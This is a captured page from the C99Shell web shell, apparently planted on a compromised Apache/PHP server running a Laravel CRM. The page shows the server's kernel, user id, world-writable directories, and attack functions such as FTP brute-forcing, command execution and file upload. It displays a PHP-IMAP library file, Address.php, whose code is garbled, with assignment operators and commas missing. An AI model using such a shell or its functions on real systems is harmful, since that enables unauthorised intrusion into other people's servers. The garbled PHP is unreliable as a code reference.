!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/vendor/webklex/php-imap/src/   drwxrwxrwx
Free 13.24 GB of 57.97 GB (22.83%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Address.php (1.93 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
* File:     Address.php
* Category: -
* Author:   M. Goldenbaum
* Created:  01.01.21 21:17
* Updated:  -
*
* Description:
*  -
*/

namespace Webklex\PHPIMAP;

/**
 * Class Address
 *
 * @package Webklex\PHPIMAP
 */
class Address {

    
/**
     * Address attributes
     * @var string $personal
     * @var string $mailbox
     * @var string $host
     * @var string $mail
     * @var string $full
     */
    
public string $personal "";
    public 
string $mailbox "";
    public 
string $host "";
    public 
string $mail "";
    public 
string $full "";

    
/**
     * Address constructor.
     * @param object $object
     */
    
public function __construct(object $object) {
        if (
property_exists($object"personal")){ $this->personal $object->personal ?? ''; }
        if (
property_exists($object"mailbox")){ $this->mailbox $object->mailbox ?? ''; }
        if (
property_exists($object"host")){ $this->host $object->host ?? ''; }
        if (
property_exists($object"mail")){ $this->mail $object->mail ?? ''; }
        if (
property_exists($object"full")){ $this->full $object->full ?? ''; }
    }


    
/**
     * Return the stringified address
     *
     * @return string
     */
    
public function __toString() {
        return 
$this->full ?: "";
    }

    
/**
     * Return the serialized address
     *
     * @return array
     */
    
public function __serialize(){
        return [
            
"personal" => $this->personal,
            
"mailbox" => $this->mailbox,
            
"host" => $this->host,
            
"mail" => $this->mail,
            
"full" => $this->full,
        ];
    }

    
/**
     * Convert instance to array
     *
     * @return array
     */
    
public function toArray(): array {
        return 
$this->__serialize();
    }

    
/**
     * Return the stringified attribute
     *
     * @return string
     */
    
public function toString(): string {
        return 
$this->__toString();
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0065 ]--